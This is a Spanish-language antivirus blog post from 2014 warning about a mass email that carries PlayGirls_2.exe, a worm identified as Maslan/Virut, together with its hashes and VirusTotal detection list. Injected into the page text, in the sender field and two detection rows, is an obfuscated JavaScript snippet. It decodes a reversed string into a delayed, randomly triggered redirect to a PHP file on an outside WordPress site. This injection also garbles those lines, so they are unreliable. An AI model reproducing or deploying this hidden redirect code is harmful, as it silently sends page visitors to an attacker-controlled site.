MAIL MASIVO QUE SE ESTA RECIBIENDO ANEXANDO UN GUSANO ROOTKIT MASLAN, INFECTADO CON UNA VARIANTE DEL VIRUT

Publicado el 26 febrero 2014 ¬ 9:39 amh.mscComentarios desactivados en MAIL MASIVO QUE SE ESTA RECIBIENDO ANEXANDO UN GUSANO ROOTKIT MASLAN, INFECTADO CON UNA VARIANTE DEL VIRUT

Aunque ya es previsible por el sentido comun de los usuarios, que el fichero anexado a este mail es un virus, por la forma que llega:

 

MAIL MALICIOSO:
_______________

 

Asunto: 12345
De: “Arnold Ruben” <$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:arnold_1999@mail.com”>mailto:arnold_1999@mail.com
ANEXO : PlayGirls_2.exe
_____________________

FIN DEL MAL MALICIOSO
Avisamos que si se recibe dicho mail, no debe ejecutarse el fichero anexado, aunque ello sea lo que ya indicamos siempre respecto a mails no solicitados.
En este caso es un gusano infectado con el VIRUT, conocido ROOTKIT que si entra en el ordenador puede infectar todos los EXE que encuentre.

Aunque ya está muy controlado actualmente por la mayoria de los antivirus, entre ellos NOD32, Kaspersky, MCAfee, etc,  siempre cabe que haya usuarios que no tengan activo el antivirus y si ejecutaran el fichero en cuestión, tuvieran malas consecuencias.
Si bien añadimos la cadena de control de dicho gusano al ELISTARA 29.46 de hoy, para la desinfeción de los ficheros infectados debe usarse un antivirus que lo limpie, ya que de ello no se encarga nuestra utilidad de control de nuevas variantes de malwares no infecciosos.
EL preanalisis de virustotal ofrece este informe:

 

MD5 153047e11d88821d132bdc5c0025e6d2
SHA1 5b980a5d855221e0b6cc9a533fcb23a97ab7095f
Tamaño del fichero 109.5 KB ( 112128 bytes )
SHA256: 4838751f3b957f41f055d90edd6d308f3e843701cfb12bdd5a96fae5baf9ceae
Nombre: PlayGirls_2.exe
Detecciones: 44 / 49
Fecha de análisis: 2014-02-26 08:05:25 UTC ( hace 17 minutos )

0 1
Antivirus  Resultado  Actualización
AVG  Worm/Bobax.AF  20140225
Ad-Aware  Win32.Virtob.6.Gen  20140226
Agnitum  Win32.Virut.Gen.4  20140225
AhnLab-V3  Win32/Virut.B  20140225
AntiVir  W32/Virut.AC  20140226
Avast  Win32:Maslan-J [Wrm]  20140226
Baidu-International  Virus.Win32.Virut.$a  20140226
BitDefender  Win32.Virtob.6.Gen  20140226
Bkav  W32.VtLightM.PE  20140225
CAT-QuickHeal  W32.Virut.F  20140226
CMC  Virus.Win32.Virut!O  20140220
Commtouch  W32/Sality.N  20140226
Comodo  Virus.Win32.Virut.AZ  20140226
DrWeb  Win32.HLLM.Alaxala  20140226
ESET-NOD32  Win32/Virut.AZ  20140226
Emsisoft  Win32.Virtob.6.Gen (B)  20140226
F-Prot  W32/Sality.N  20140226
F-Secure  Win32.Virtob.6.Gen  20140226
Fortinet  W32/Virut.AE  20140226
GData  Win32.Virtob.6.Gen  20140226
Ikarus  Net-Worm.Win32.Maslan.A  20140226
Jiangmin  Win32/Virut.ai  20140226
K7AntiVirus  Virus ( 00001b781 )  20140225
K7GW  Virus ( 00001b781 )  20140225
Kaspersky  Virus.Win32.Virut.az  20140226
Kingsoft  Win32.Virut.xf.57344  20140226
McAfee  W32/Virut.gen  20140226
McAfee-GW-Edition  Heuristic.BehavesLike.Win32.Suspicious-PKR.G  20140226
MicroWorld-eScan  Win32.Virtob.6.Gen  20140226
NANO-Antivirus  Virus.Win32.Virut.hpeg  20140226
Norman  Sality.DNA  20140224
Panda  W32/Virutas.W  20140225
Qihoo-360  Virus.Win32.Virut.H  20140226
Rising  PE:Worm.Win32.Maslan.d!1173756712  20140226
Sophos  W32/Maslan-C  20140226
Symantec  $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:Win32.Maslan.B@mm”>Win32.Maslan.B@mm  –
CAT-QuickHeal  I-Worm.Maslan.b  –
ClamAV  Exploit.Shellcode.X86-Gen-1  –
DrWeb  Win32.HLLM.Alaxala  –
Ewido  Worm.Maslan.b  –
F-Prot  W32/Maslan.C  –
F-Secure  Net-Worm.Win32.Maslan.b  –
Fortinet  $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:Win32/Maslan.C@mm”>Win32/Maslan.C@mm  –
NOD32v2  Win32/Maslan.B  –
Norman  Maslan.C  –
Panda  W32/Maslan.B.worm  –
PandaBeta  W32/Maslan.B.worm –
Sophos  W32/Maslan-C  –
Symantec  __________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.

Virus, , , , , , , , , , , , , , , , , ,

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies